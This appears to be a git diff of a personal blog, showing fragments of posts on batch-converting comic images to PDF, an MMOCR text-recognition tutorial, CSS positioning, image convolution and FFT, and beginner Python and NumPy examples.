                os.rename(old_file, new_file)

# Usage example
folder_path = r'./如果历史是一群喵/第 184 章'  # replace with the target folder
rename_files_in_folder(folder_path)
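
Since every chapter after 162 had the extension problem, a hypothetical batch version of the call above (the regex mirrors the '第 N 章' folder naming used by the crawler):

import re

base = './如果历史是一群喵'
for name in os.listdir(base):
    match = re.search(r'第 (\d+) 章', name)
    if match and int(match.group(1)) > 162:
        rename_files_in_folder(os.path.join(base, name))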

Pad each scraped image with white on all sides so its aspect ratio matches A4 paper:

import os
import re
from tqdm import tqdm
from PIL import Image

load_path = "./如果历史是一群喵"
save_path = "./如果历史是一群喵 resized"

# A4 portrait size in pixels at 72 DPI
A4_width = 595
A4_height = 840
A4_aspect_ratio = A4_width / A4_height

item_list = os.listdir(load_path)
item_list.sort(key=lambda x: int(re.search(r'第 (\d+) 章', x).group(1)))

# Walk the top-level chapter folders
for item in item_list:
    item_path = os.path.join(load_path, item)
    print(item)
    if os.path.isdir(item_path):
        # Custom sort: extract the numeric part of each file name and sort numerically
        file_list = os.listdir(item_path)
        file_list.sort(key=lambda x: int(re.match(r"(\d+)", x).group(0)))
        # Find the first file whose extension is not '.jpeg' and drop it and everything after it
        for i, file in enumerate(file_list):
            if not file.endswith('.jpeg'):
                file_list = file_list[:i]  # the slice keeps only the elements before i
                break
        for image_file in tqdm(file_list):
            image = Image.open(os.path.join(item_path, image_file))
            # Original width and height of the image
            original_width, original_height = image.size

            # Keep the aspect ratio fixed while computing the new size
            aspect_ratio = original_width / original_height

            # Decide how to resize based on the aspect ratio
            if aspect_ratio > A4_aspect_ratio:
                # The image is too wide: pin the width to A4 width and derive the height
                new_width = A4_width
                new_height = int(new_width / aspect_ratio)
            else:
                # The image is too tall: pin the height to A4 height and derive the width
                new_height = A4_height
                new_width = int(new_height * aspect_ratio)

            # Resize the image
            resized_image = image.resize((new_width, new_height))

            # Create a white A4-sized background
            background = Image.new('RGB', (A4_width, A4_height), (255, 255, 255))
            # Position that centers the image on the A4 background
            left = (A4_width - new_width) // 2
            top = (A4_height - new_height) // 2

            # Paste the resized image onto the background
            background.paste(resized_image, (left, top))

            folder_path = os.path.join(save_path, item)
            if not os.path.exists(folder_path):
                # Create the folder if it doesn't exist yet
                os.makedirs(folder_path)
            background.save(os.path.join(folder_path, image_file), format="JPEG", quality=80)

Output PDF

Convert the resized images above into PDF files:

from fpdf import FPDF
import re
import os
from tqdm import tqdm

load_path = './如果历史是一群喵 resized/'
save_path = './如果历史是一群喵 pdf/'

# Convert a list of image files into one PDF
def images_to_pdf(image_paths, output_pdf_path):
    pdf = FPDF()
    # Sort pages numerically by the number in "<n>.jpeg"
    image_paths.sort(key=lambda x: int(re.search(r'(\d+)\.jpeg', x).group(1)))
    for image_path in image_paths:
        # Add a new page and place the image at full A4 size (210 mm wide, 297 mm tall)
        pdf.add_page()
        pdf.image(image_path, x=0, y=0, w=210, h=297)

    # Write out the PDF file
    pdf.output(output_pdf_path)

os.makedirs(save_path, exist_ok=True)  # make sure the output folder exists
for folder in tqdm(os.listdir(load_path)):
    image_folder = os.path.join(load_path, folder)
    image_paths = [os.path.join(image_folder, f) for f in os.listdir(image_folder)]

    output_pdf_path = os.path.join(save_path, folder + '.pdf')  # output path for this PDF
    images_to_pdf(image_paths, output_pdf_path)

The final files: 如果历史是一群喵 pdf, shared via Baidu Netdisk.

    @@ -1675,6 +1673,8 @@

diff --git a/posts/CSS-position-absolute/index.html b/posts/CSS-position-absolute/index.html

Main text

Source code:

    <style>
    .desc {
    position: absolute;
    width: 100%;
    background: #ffffffa0;
    bottom: 0px;
    margin: 0 auto;
    text-align: center;
    color: #222;
    }
    </style>

    <div style="margin: 0 auto; width: 60%; aspect-ratio: 0.8; position: relative; background: #ffdfdf; box-shadow: 4px 4px 5px rgba(0, 0, 0, 0.5);">
    <div style="position: absolute; left: 0%; top: 0%; width: 25%;">
    <img style="margin: 0; max-width: 100%;" alt="张飞" src="ZhangFei.webp"/>
    <p class="desc">张飞</p>
    </div>
    <div style="position: absolute; left: 25%; top: 0%; width: 50%;">
    <img style="margin: 0; max-width: 100%;" alt="曹操" src="CaoCao.webp"/>
    <p class="desc">曹操</p>
    </div>
    <div style="position: absolute; left: 75%; top: 0%; width: 25%;">
    <img style="margin: 0; max-width: 100%;" alt="马超" src="MaChao.webp"/>
    <p class="desc">马超</p>
    </div>
    <div style="position: absolute; left: 0%; top: 40%; width: 25%;">
    <img style="margin: 0; max-width: 100%;" alt="赵云" src="ZhaoYun.webp"/>
    <p class="desc">赵云</p>
    </div>
    <div style="position: absolute; left: 25%; top: 40%; width: 50%;">
    <img style="margin: 0; max-width: 100%;" alt="关羽" src="GuanYu.webp"/>
    <p class="desc">关羽</p>
    </div>
    <div style="position: absolute; left: 75%; top: 40%; width: 25%;">
    <img style="margin: 0; max-width: 100%;" alt="黄忠" src="HuangZhong.webp"/>
    <p class="desc">黄忠</p>
    </div>
    <div style="position: absolute; left: 25%; top: 60%; width: 25%;">
    <img style="margin: 0; max-width: 100%;" alt="士兵" src="ShiBing.webp"/>
    <p class="desc">士兵</p>
    </div>
    <div style="position: absolute; left: 50%; top: 60%; width: 25%;">
    <img style="margin: 0; max-width: 100%;" alt="士兵" src="ShiBing.webp"/>
    <p class="desc">士兵</p>
    </div>
    <div style="position: absolute; left: 0%; top: 80%; width: 25%;">
    <img style="margin: 0; max-width: 100%;" alt="士兵" src="ShiBing.webp"/>
    <p class="desc">士兵</p>
    </div>
    <div style="position: absolute; left: 75%; top: 80%; width: 25%;">
    <img style="margin: 0; max-width: 100%;" alt="士兵" src="ShiBing.webp"/>
    <p class="desc">士兵</p>
    </div>
    </div>

    <div style="margin: -50px 0 0 -80px; width: calc(100% + 160px); height: 80px; background: #00000020;"></div>
    @@ -697,6 +695,8 @@

diff --git "a/posts/Course-文本识别 OCR 神器 MMOCR/index.html" "b/posts/Course-文本识别 OCR 神器 MMOCR/index.html"

Installing Jupyter inside a conda virtual environment, and how to connect a conda env to Jupyter - CSDN blog

Install MMOCR: [Paper-MMOCR-A Comprehensive Toolbox for Text Detection, Recognition and Understanding | Zi-Zi’s Journey](/2024/05/30/Paper-MMOCR-A Comprehensive Toolbox for Text Detection, Recognition and Understanding/)

Verify the installation:

# Check PyTorch
import torch, torchvision
print('PyTorch version', torch.__version__)
print('CUDA available', torch.cuda.is_available())

PyTorch version 1.13.1+cu117
CUDA available True

# Check mmcv
import mmcv
from mmcv.ops import get_compiling_cuda_version, get_compiler_version
print('MMCV version', mmcv.__version__)
print('CUDA version', get_compiling_cuda_version())
print('Compiler version', get_compiler_version())

MMCV version 2.1.0
CUDA version 11.7
Compiler version MSVC 192930148

# Check mmocr
import mmocr
print('mmocr version', mmocr.__version__)

mmocr version 1.0.1

B1 Pretrained model inference - text recognition

Import the packages:

from mmocr.apis import MMOCRInferencer

import cv2

import matplotlib.pyplot as plt
%matplotlib inline

Load the model and instantiate MMOCRInferencer; rec='svtr-small' selects the SVTR model for text recognition: mmocr/configs/textrecog/svtr at main · open-mmlab/mmocr (github.com)

Download https://download.openmmlab.com/mmocr/textrecog/svtr/svtr-small_20e_st_mj/svtr-small_20e_st_mj-35d800d6.pth, put it somewhere convenient, and point rec_weights at it (if unset, the checkpoint is downloaded automatically to a default cache location).

infer = MMOCRInferencer(rec='svtr-small', rec_weights='./models/svtr-small_20e_st_mj-35d800d6.pth')

Loads checkpoint by local backend from path: ./models/svtr-small_20e_st_mj-35d800d6.pth

Load the image for prediction (I choose you!):

    png

Scene text recognition models only support recognition on small images cropped to the text region.

img_path = './demo/ILoveGZ.png'
img_bgr = cv2.imread(img_path)
plt.imshow(img_bgr[:,:,::-1])
plt.show()

    png

Run inference:

result = infer(img_path, save_vis=True, return_vis=True)

Parse the predictions: text content and confidence

result.keys()

dict_keys(['predictions', 'visualization'])

result['predictions']

[{'rec_texts': ['igz'], 'rec_scores': [0.9166250427563986]}]
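To pull the recognized strings and their scores out of this structure, a simple zip over the two lists works (a small sketch based on the keys shown above):

pred = result['predictions'][0]
for text, score in zip(pred['rec_texts'], pred['rec_scores']):
    # one recognized string and its confidence
    print(f'{text}: {score:.3f}')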

Parse the predictions: visualization:

plt.imshow(result['visualization'][0])
plt.show()

    png

B2 Pretrained model inference - text region detection

Import the packages:

from mmocr.apis import MMOCRInferencer

import cv2
import numpy as np

import matplotlib.pyplot as plt
%matplotlib inline

Load the model and instantiate MMOCRInferencer; det='textsnake' selects the TextSnake model for text detection: [Text detection models - MMOCR 1.0.1 documentation](https://github.com/open-mmlab/mmocr/tree/main/configs/textrecog/svtr).

Download https://download.openmmlab.com/mmocr/textdet/textsnake/textsnake_resnet50-oclip_fpn-unet_1200e_ctw1500/textsnake_resnet50-oclip_fpn-unet_1200e_ctw1500_20221101_134814-a216e5b2.pth, put it somewhere convenient, and point det_weights at it (if unset, the checkpoint is downloaded automatically).

infer = MMOCRInferencer(det='textsnake', det_weights='./models/textsnake_resnet50-oclip_fpn-unet_1200e_ctw1500_20221101_134814-a216e5b2.pth')

Load the image for prediction (I choose you!):

    jpg

img_path = './demo/HBU.jpg'
img_bgr = cv2.imread(img_path)
plt.imshow(img_bgr[:,:,::-1])
plt.show()

    png

Run inference:

result = infer(img_path, return_vis=True)

Parse the predictions: text regions and confidence:

result.keys()

dict_keys(['predictions', 'visualization'])

Parse the predictions: visualizing the text regions:

plt.imshow(result['visualization'][0])
plt.show()

    png


You can also load a config file (Method) and the matching weights (Model) yourself:

Download them from here: Text detection models - MMOCR 1.0.1 documentation

infer = MMOCRInferencer(det='./configs/textdet/dbnet/dbnet_resnet18_fpnc_1200e_totaltext.py', det_weights='./models/dbnet_resnet18_fpnc_1200e_totaltext-3ed3233c.pth')

Loads checkpoint by local backend from path: ./models/dbnet_resnet18_fpnc_1200e_totaltext-3ed3233c.pth

Although the predicted boxes are rectangles, the model does appear to have detected the curved text; the rectangles come from post-processing:

    png
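That post-processing is essentially an axis-aligned bounding box around each detected polygon; a minimal sketch of the idea (my own illustration, not MMOCR's actual implementation):

import numpy as np

def polygon_to_bbox(polygon):
    # polygon is a flat list [x0, y0, x1, y1, ...] as in 'det_polygons'
    pts = np.array(polygon).reshape(-1, 2)
    x_min, y_min = pts.min(axis=0)
    x_max, y_max = pts.max(axis=0)
    return x_min, y_min, x_max, y_max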


With a model like the following:

infer = MMOCRInferencer(det='dbnet')

Loads checkpoint by http backend from path: https://download.openmmlab.com/mmocr/textdet/dbnet/dbnet_resnet50-oclip_1200e_icdar2015/dbnet_resnet50-oclip_1200e_icdar2015_20221102_115917-bde8c87a.pth

For curved text, however, detection fails:

    png

B3 Pretrained model inference - end-to-end OCR

This amounts to first running scene text detection on the image, then scene text recognition.

Import the packages:

from mmocr.apis import MMOCRInferencer

import cv2
import numpy as np

import matplotlib.pyplot as plt
%matplotlib inline

Load the scene text detection model, DBNet, together with the scene text recognition model, svtr-small:

infer = MMOCRInferencer(det='./configs/textdet/dbnet/dbnet_resnet18_fpnc_1200e_totaltext.py',
                        det_weights='./models/dbnet_resnet18_fpnc_1200e_totaltext-3ed3233c.pth',
                        rec='svtr-small')

Load the image for prediction (I choose you!):

    jpg

img_path = './demo/TJ.jpg'
img_bgr = cv2.imread(img_path)
plt.imshow(img_bgr[:,:,::-1])
plt.show()

    png

Run inference and collect the results:

result = infer(img_path, save_vis=True, return_vis=True)

result['predictions']

[{'rec_texts': ['scotland<UKN>s',
  'cotland<UKN>s',
  'scotland<UKN>s',
  'cadenhead<UKN>s',
  'cadenhead<UKN>s',
  'cadenhead<UKN>s',
  'cadenhead<UKN>s',
  'shop',
  'whisky',
  'cadenhead',
  'style<UKN>',
  '<UKN>town',
  'italian'],
 'rec_scores': [0.977949458360672,
  ...
  0.9994089433125087],
 'det_polygons': [[759.0371750764526,
   505.635521930197,
   759.5478147298675,
   494.91445790166443,
   809.203618756371,
   497.2781902810802,
   808.6929791029562,
   507.99925430961275],
  ...
  [228.83700465086648,
   339.75968070652175,
   231.53506466615698,
   289.6377231763757,
   546.131936480632,
   306.560987389606,
   543.4338764653415,
   356.6829250169837]],
 'det_scores': [0.579411506652832,
  ...
  0.8963190913200378]}]

We now have the text instances, the text regions, and their corresponding confidences.
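Since the detection and recognition entries line up index by index, pairing them is a simple zip (a sketch over the keys shown above):

pred = result['predictions'][0]
for text, poly, d_score in zip(pred['rec_texts'], pred['det_polygons'], pred['det_scores']):
    # each detected region with its recognized string and detection confidence
    print(f'{text!r}: det score {d_score:.2f}, {len(poly) // 2} polygon points')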

Visualize the OCR result (it can also be found under the results/vis/ folder):

    jpg

Or save it locally yourself:

import numpy as np
from PIL import Image

Image.fromarray(result['visualization'][0]).save('output_image.png')

B4 Pretrained model inference - KIE, an OCR downstream task
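A minimal sketch of what KIE inference looks like with MMOCRInferencer, assuming the SDMGR model from the MMOCR model zoo; the input image path here is a made-up placeholder:

from mmocr.apis import MMOCRInferencer

# KIE runs on top of detection and recognition results, so all three
# models are passed together (kie='SDMGR' is assumed to be available
# in the installed model zoo; './demo/receipt.jpg' is a placeholder path)
infer = MMOCRInferencer(det='dbnet', rec='svtr-small', kie='SDMGR')
result = infer('./demo/receipt.jpg', save_vis=True)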

train_pipeline = [
    dict(type='LoadImageFromFile', color_type='color_ignore_orientation'),
    dict(
        type='LoadOCRAnnotations',
        with_polygon=True,
        with_bbox=True,
        with_label=True,
    ),
    dict(type='FixInvalidPolygon', min_poly_points=4),
    dict(
        type='TorchVisionWrapper',
        op='ColorJitter',
        brightness=32.0 / 255,
        saturation=0.5),
    dict(
        type='ImgAugWrapper',
        args=[['Fliplr', 0.5],
              dict(cls='Affine', rotate=[-10, 10]), ['Resize', [0.5, 3.0]]]),
    dict(type='RandomCrop', min_side_ratio=0.1),
    dict(type='Resize', scale=(640, 640), keep_ratio=True),
    dict(type='Pad', size=(640, 640)),
    dict(
        type='PackTextDetInputs',
        meta_keys=('img_path', 'ori_shape', 'img_shape'))
]
• train_pipeline defines the sequence of preprocessing steps applied to the training data:

      @@ -800,7 +798,7 @@

test_pipeline = [
    dict(type='LoadImageFromFile', color_type='color_ignore_orientation'),
    dict(type='Resize', scale=(1333, 736), keep_ratio=True),
    dict(
        type='LoadOCRAnnotations',
        with_polygon=True,
        with_bbox=True,
        with_label=True,
    ),
    dict(type='FixInvalidPolygon', min_poly_points=4),
    dict(
        type='PackTextDetInputs',
        meta_keys=('img_path', 'ori_shape', 'img_shape', 'scale_factor'))
]
• test_pipeline is similar to train_pipeline, but adjusted for the test phase:

      @@ -813,10 +811,10 @@

# dataset settings
totaltext_textdet_train = _base_.totaltext_textdet_train
totaltext_textdet_test = _base_.totaltext_textdet_test
totaltext_textdet_train.pipeline = train_pipeline
totaltext_textdet_test.pipeline = test_pipeline
• Fetch the training and test datasets from the base config and attach the corresponding pipelines to them.
train_dataloader = dict(
    batch_size=16,
    num_workers=16,
    pin_memory=True,
    persistent_workers=True,
    sampler=dict(type='DefaultSampler', shuffle=True),
    dataset=totaltext_textdet_train)

val_dataloader = dict(
    batch_size=1,
    num_workers=1,
    pin_memory=True,
    persistent_workers=True,
    sampler=dict(type='DefaultSampler', shuffle=False),
    dataset=totaltext_textdet_test)

test_dataloader = val_dataloader
• train_dataloader and val_dataloader define the data loaders for training and validation:

      @@ -838,7 +836,7 @@

auto_scale_lr = dict(base_batch_size=16)
• Enables automatic learning-rate scaling, so the learning rate is adjusted according to how the actual batch size compares to this base batch size.
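The rule behind this option is linear scaling; a rough sketch (the base learning rate value is illustrative, not taken from this config):

base_batch_size = 16
base_lr = 0.007           # illustrative value, not from this config

actual_batch_size = 32    # e.g. when training on more GPUs
scaled_lr = base_lr * actual_batch_size / base_batch_size
print(scaled_lr)          # 0.014: double the batch, double the learning rate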
    @@ -4724,6 +4722,8 @@

diff --git "a/posts/Course-游戏心理学-中国传媒大学/index.html" "b/posts/Course-游戏心理学-中国传媒大学/index.html"

Main text

Miscellaneous

Text copied across line breaks from the official PDFs keeps stray spaces, and deleting them by hand is a real pain! The Python snippet below removes them all in one pass:

import os
import re

def remove_spaces_between_chinese(text):
    # Regex matching whitespace between two Chinese characters
    # (u4e00-u9fff is the common CJK character range in Unicode)
    pattern = re.compile(r'([\u4e00-\u9fff])\s+([\u4e00-\u9fff])')
    # Drop the matched whitespace
    return pattern.sub(r'\1\2', text)

def process_md_files(directory):
    # Walk every .md file in the folder
    for filename in os.listdir(directory):
        if filename.endswith(".md"):
            file_path = os.path.join(directory, filename)
            with open(file_path, 'r', encoding='utf-8') as file:
                content = file.read()

            # Remove the spaces between Chinese characters
            updated_content = remove_spaces_between_chinese(content)

            # Write back only if the content actually changed
            if content != updated_content:
                with open(file_path, 'w', encoding='utf-8') as file:
                    file.write(updated_content)
                print(f"Processed: {filename}")

# Point this at the folder you want to process
directory_path = "your_directory_path_here"
process_md_files(directory_path)
    @@ -645,6 +643,8 @@

diff --git a/posts/DIP-Convolutions in image processing/index.html b/posts/DIP-Convolutions in image processing/index.html

It makes the multiplied data take on some features of its surrounding data:

    jpg
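A one-dimensional moving average makes this concrete: each output value mixes a point with its neighbours (a small sketch with made-up numbers):

import numpy as np

signal = np.array([0.0, 0.0, 1.0, 0.0, 0.0])  # a lone spike
kernel = np.ones(3) / 3                       # 3-point averaging kernel

# mode='same' keeps the output the same length as the input
print(np.convolve(signal, kernel, mode='same'))
# [0.     0.3333 0.3333 0.3333 0.    ]  the spike bleeds into its neighbours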

Applications in digital image processing

import cv2
import matplotlib.pyplot as plt
import numpy as np

img = cv2.imread('images/tom_in_bowtie.jpg')
plt.imshow(cv2.cvtColor(img, cv2.COLOR_BGR2RGB))
    <matplotlib.image.AxesImage at 0x2a11b90d760>
     

    png

img.shape
    (500, 399, 3)
     
def plot(array):
    print(array)
    plt.matshow(array, cmap='Wistia')
    plt.colorbar()
    for x in range(len(array)):
        for y in range(len(array)):
            plt.annotate(round(array[x, y], 3), xy=(x, y), horizontalalignment='center',
                         verticalalignment='center')
    return plt

Mean filtering

    jpg

kernel = np.ones((3, 3)) / 9
plot(kernel)
    [[0.11111111 0.11111111 0.11111111]
      [0.11111111 0.11111111 0.11111111]
      [0.11111111 0.11111111 0.11111111]]
    @@ -442,7 +440,7 @@ 

    <module 'matplotlib.pyplot' from 'C:\\Users\\gzjzx\\anaconda3\\lib\\site-packages\\matplotlib\\pyplot.py'>

    png

fimg = cv2.filter2D(img, cv2.CV_8UC3, kernel)
plt.imshow(cv2.cvtColor(fimg, cv2.COLOR_BGR2RGB))
    <matplotlib.image.AxesImage at 0x2a11c0d0af0>
     

    png

    @@ -460,8 +458,8 @@

@ is Python's built-in matrix multiplication operator.
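For instance, the outer product of a column vector and a row vector via @ is exactly how the separable 2-D Gaussian below is assembled (a tiny standalone sketch):

import numpy as np

col = np.array([[1.0], [2.0], [1.0]])  # (3, 1) column vector
row = col.T                            # (1, 3) row vector

print(col @ row)  # (3, 1) @ (1, 3) -> (3, 3) outer product
# [[1. 2. 1.]
#  [2. 4. 2.]
#  [1. 2. 1.]]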

def gaussian_kernel_2d(ksize, sigma):
    return cv2.getGaussianKernel(ksize, sigma) @ cv2.getGaussianKernel(ksize, sigma).T

kernel = gaussian_kernel_2d(7, -1)
plot(kernel)
    [[0.00097656 0.00341797 0.00683594 0.00878906 0.00683594 0.00341797
       0.00097656]
      [0.00341797 0.01196289 0.02392578 0.03076172 0.02392578 0.01196289
    @@ -482,21 +480,21 @@ 

    <module 'matplotlib.pyplot' from 'C:\\Users\\gzjzx\\anaconda3\\lib\\site-packages\\matplotlib\\pyplot.py'>

    png

sum(sum(kernel))
    1.0
     

Applying Gaussian filtering

fimg = cv2.filter2D(img, cv2.CV_8UC3, kernel)
plt.imshow(cv2.cvtColor(fimg, cv2.COLOR_BGR2RGB))
    <matplotlib.image.AxesImage at 0x1c2abcbef70>
     

    png

Equivalent to

fimg = cv2.GaussianBlur(img, (7, 7), -1)
plt.imshow(cv2.cvtColor(fimg, cv2.COLOR_BGR2RGB))
    <matplotlib.image.AxesImage at 0x1c2aa6a6910>
     

    png

Sharpening

kernel = np.array([[-0.5, -1.0, -0.5],
                   [-1.0, 7.0, -1.0],
                   [-0.5, -1.0, -0.5]])
plot(kernel)
    [[-0.5 -1.  -0.5]
      [-1.   7.  -1. ]
      [-0.5 -1.  -0.5]]
    @@ -515,16 +513,16 @@ 

Sharpening

    <module 'matplotlib.pyplot' from 'C:\\Users\\gzjzx\\anaconda3\\lib\\site-packages\\matplotlib\\pyplot.py'>

    png

sum(sum(kernel))
    1.0
     
fimg = cv2.filter2D(img, cv2.CV_8UC3, kernel)
plt.imshow(cv2.cvtColor(fimg, cv2.COLOR_BGR2RGB))
    <matplotlib.image.AxesImage at 0x1c2a9376fd0>
     

    png

Edge detection

    jpg

# Not sure why the second row here displays as all 0.0...
kernel = np.array([[-0.125, 0.0, 0.125],
                   [-0.25, 0.0, 0.25],
                   [-0.125, 0.0, 0.125]])
plot(kernel)
    [[-0.125  0.     0.125]
      [-0.25   0.     0.25 ]
      [-0.125  0.     0.125]]
    @@ -534,10 +532,10 @@ 

    <module 'matplotlib.pyplot' from 'C:\\Users\\gzjzx\\anaconda3\\lib\\site-packages\\matplotlib\\pyplot.py'>

    jpg

sum(sum(kernel))
    0.0
     
fimg = cv2.filter2D(img, cv2.CV_8UC3, kernel)
plt.imshow(4 * cv2.cvtColor(fimg, cv2.COLOR_BGR2RGB))  # too dark, so multiply by 4
    <matplotlib.image.AxesImage at 0x2a11c124520>
     

    png

    @@ -549,30 +547,30 @@

    But what is the Fourier Transform? A visual introduction. - YouTube

In other words, direct convolution uses a huge number of multiplications, and borrowing the idea behind the FFT algorithm speeds things up?

import numpy as np

arr1 = np.random.random(100000)
arr2 = np.random.random(100000)

%%timeit
np.convolve(arr1, arr2)
    1.66s ± 341ms per loop (mean ± std. dev. of 7 runs, 1 loop each)
     
import scipy.signal

%%timeit
scipy.signal.fftconvolve(arr1, arr2)
    10.8ms ± 1.24ms per loop (mean ± std. dev. of 7 runs, 100 loops each)
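The speedup matches the operation counts: direct convolution costs O(N·M) multiplications while the FFT route is roughly O(N log N); a back-of-the-envelope check for the arrays above:

import math

N = M = 100_000
direct_ops = N * M                         # ~1e10 multiply-adds
fft_ops = 3 * (N + M) * math.log2(N + M)   # three FFTs of the padded length, roughly

print(f'{direct_ops:.1e} vs {fft_ops:.1e}')  # ~1.0e+10 vs ~1.1e+07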
     

By definition

def conv(a, b):
    N = len(a)
    M = len(b)
    YN = N + M - 1
    y = [0.0 for i in range(YN)]
    for n in range(YN):
        for m in range(M):
            if 0 <= n - m and n - m < N:
                y[n] += a[n - m] * b[m]
    return y

conv((1, 2, 3), (4, 5, 6))
    [4.0, 13.0, 28.0, 27.0, 18.0]
     

Using the NumPy library

import numpy as np

np.convolve((1, 2, 3), (4, 5, 6))
    array([ 4, 13, 28, 27, 18])
     

Fast convolution via FFT

def convfft(a, b):
    N = len(a)
    M = len(b)
    YN = N + M - 1
    FFT_N = 2 ** (int(np.log2(YN)) + 1)
    afft = np.fft.fft(a, FFT_N)
    bfft = np.fft.fft(b, FFT_N)
    abfft = afft * bfft
    y = np.fft.ifft(abfft).real[:YN]
    return y

convfft((1, 2, 3), (4, 5, 6))
    array([ 4., 13., 28., 27., 18.])
     

Comparison

import time
import matplotlib.pyplot as plt

def run(func, a, b):
    n = 1
    start = time.perf_counter()
    for j in range(n):
        func(a, b)
    end = time.perf_counter()
    run_time = end - start
    return run_time / n

n_list = []
t1_list = []
t2_list = []
for i in range(10):
    count = i * 1000 + 10
    print(count)
    a = np.ones(count)
    b = np.ones(count)
    t1 = run(conv, a, b)      # direct convolution
    t2 = run(convfft, a, b)   # FFT convolution
    n_list.append(count)
    t1_list.append(t1)
    t2_list.append(t2)

# plot
plt.plot(n_list, t1_list, label='conv')
plt.plot(n_list, t2_list, label='convfft')
plt.legend()
plt.title(u"convolve times")
plt.ylabel(u"run times(ms/point)")
plt.xlabel(u"length")
plt.show()
    10
     1010
     2010
    @@ -777,6 +775,8 @@ 

Comparison

diff --git a/posts/DIP-Introductory python tutorials for image processing(1-21)-Python Basics/index.html b/posts/DIP-Introductory python tutorials for image processing(1-21)-Python Basics/index.html

from skimage import io, filters
from matplotlib import pyplot as plt

img = io.imread('images/Osteosarcoma_01_25Sigma_noise.tif')  # read the image
gaussian_img = filters.gaussian(img, sigma=2)  # apply Gaussian blur

plt.imshow(gaussian_img)  # show the image

    png

    Tutorial 05 - How to install python using Anaconda

Walks you through installing Anaconda and Spyder…

    @@ -488,40 +486,40 @@

life_sciences = {'Botany': 'plants',
                 'Zoology': 'animals',
                 'Virology': 'viruses',
                 'Cell_biology': 'cells'}

life_sciences = dict([('Botany', 'plants'),
                      ('Zoology', 'animals'),
                      ('Virology', 'viruses'),
                      ('Cell_biology', 'cells')])

life_sciences = dict(Botany='plants',
                     Zoology='animals',
                     Virology='viruses',
                     Cell_biology='cells')
• Check the type of the defined variable
type(life_sciences)
    dict
     
• Lookup
print('Zoology' in life_sciences)
    True
     
• Add an entry
life_sciences['Neuroscience'] = 'nervous_system'

print(life_sciences)
    {'Botany': 'plants', 'Zoology': 'animals', 'Virology': 'viruses', 'Cell_biology': 'cells', 'Neuroscience': 'nervous_system'}
     
• Delete an entry
del life_sciences['Neuroscience']

print(life_sciences)
    {'Botany': 'plants', 'Zoology': 'animals', 'Virology': 'viruses', 'Cell_biology': 'cells'}
     
• Only a tuple, not a list, can be used as a dict key:
b = {(1, 0): 'a', (1, 1): 'b', (2, 2): 'c', (3, 2): 'd'}

c = {[1, 0]: 'a', [1, 1]: 'b', [2, 2]: 'c', [3, 2]: 'd'}
    ---------------------------------------------------------------------------
     
     TypeError                                 Traceback (most recent call last)
    @@ -535,13 +533,13 @@ 

d = list(life_sciences.keys())
d
    ['Botany', 'Zoology', 'Virology', 'Cell_biology']
     
• List the dict's values
e = list(life_sciences.values())
e
    ['plants', 'animals', 'viruses', 'cells']
     

    Tutorial 15 - What are numpy arrays in Python

    @@ -549,38 +547,38 @@

a = [1, 2, 3, 4, 5]
b = 2 * a
b
    [1, 2, 3, 4, 5, 1, 2, 3, 4, 5]
     
type(a)
    list
     
import numpy as np

c = np.array(a)
d = 2 * c
d
    array([ 2,  4,  6,  8, 10])
     
type(c)
    numpy.ndarray
     
c ** 2
    array([ 1,  4,  9, 16, 25], dtype=int32)
     
• Setting the data type
import numpy as np

x = np.array([[1, 2], [3, 4]])  # integer array
y = np.array([[1, 2], [3, 4]], dtype=np.float64)  # float array
y/2
    array([[0.5, 1. ],
            [1.5, 2. ]])
     
• Read an image and store it as a numpy array
from skimage import io

img1 = io.imread('images/Osteosarcoma_01.tif')
type(img1)
    numpy.ndarray
     
• Image shape is (height, width, channels)
img1.shape
    (1104, 1376, 3)
     
      @@ -590,38 +588,38 @@

a = np.ones_like(img1)
a.shape
      (1104, 1376, 3)
       
• Slicing
import numpy as np

a = np.array([[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]])
np.shape(a)
      (3, 4)
       
a
      array([[ 1,  2,  3,  4],
              [ 5,  6,  7,  8],
              [ 9, 10, 11, 12]])
       
a[:2]
      array([[1, 2, 3, 4],
              [5, 6, 7, 8]])
       
a[:2, 1:3]
      array([[2, 3],
              [6, 7]])
       
• Summation
np.sum(a, axis=0)
      array([15, 18, 21, 24])
       
np.sum(a, axis=1)
      array([10, 26, 42])
       
np.max(a)
      12
       

      Tutorial 16 - Data types in python

      @@ -702,12 +700,12 @@

from skimage import io, img_as_float

img = io.imread('images/Osteosarcoma_01.tif')
img2 = img_as_float(img)

      png

img.max()
      255
       
img2.max()
      1.0
       

      Tutorial 17 - if and else statements in python

      @@ -723,30 +721,30 @@

def squared(x):
    return x ** 2

squared(4)
      16
       
• lambda functions
a = lambda x: x ** 2
a(5)
      25
       
• Using a lambda with several arguments
a = lambda x, y: 2 * x ** 2 + 3 * y
a(3, 5)
      33
       
• Mixing lambda functions with regular functions
# S = ut + 1 / 2 a * t ** 2

def distance_eqn(u, a):
    return lambda t: u * t + ((1 / 2) * a * t ** 2)

dist = distance_eqn(5, 10)
dist(20)
      2100.0
       
distance_eqn(5, 10)(20)
      2100.0
       
      @@ -4781,6 +4779,8 @@

diff --git a/posts/DIP-Introductory python tutorials for image processing(22-28)-Python Libraries/index.html b/posts/DIP-Introductory python tutorials for image processing(22-28)-Python Libraries/index.html

Reading images with skimage

from skimage import io

img = io.imread('images/Osteosarcoma_01.tif')
img.shape  # y, x, c, dtype=uint8
      (1104, 1376, 3)
       
• Convert to float format
from skimage import io, img_as_float

img2 = img_as_float(img)

Do not use .astype(np.float) for this:

import numpy as np

img3 = img.astype(np.float64)
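The difference is easy to see (the values assume the 8-bit source image loaded above): astype keeps the raw 0-255 values, while img_as_float also rescales them into [0, 1], which is what skimage filters expect.

print(img3.max())  # 255.0: astype changes the dtype but keeps the values
print(img2.max())  # 1.0:   img_as_float also rescales into [0, 1]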

Convert back to a uint8 image

from skimage import io, img_as_ubyte

img_8bit = img_as_ubyte(img2)

      png

Reading images with OpenCV

import cv2

img_cv2 = cv2.imread('images/Osteosarcoma_01.tif')  # color image
grey_img = cv2.imread('images/Osteosarcoma_01.tif', 0)  # grayscale image
color_img = cv2.imread('images/Osteosarcoma_01.tif', 1)  # color image
img_opencv = cv2.cvtColor(color_img, cv2.COLOR_BGR2RGB)  # convert the image to RGB

OpenCV uses the BGR color space by default, while skimage uses RGB.
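Two equivalent ways to go from BGR to RGB: cvtColor as above, or simply reversing the channel axis (a quick sketch):

import numpy as np

rgb_a = cv2.cvtColor(img_cv2, cv2.COLOR_BGR2RGB)
rgb_b = img_cv2[:, :, ::-1]  # reverse the last (channel) axis

print(np.array_equal(rgb_a, rgb_b))  # True: both just swap B and R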

      png

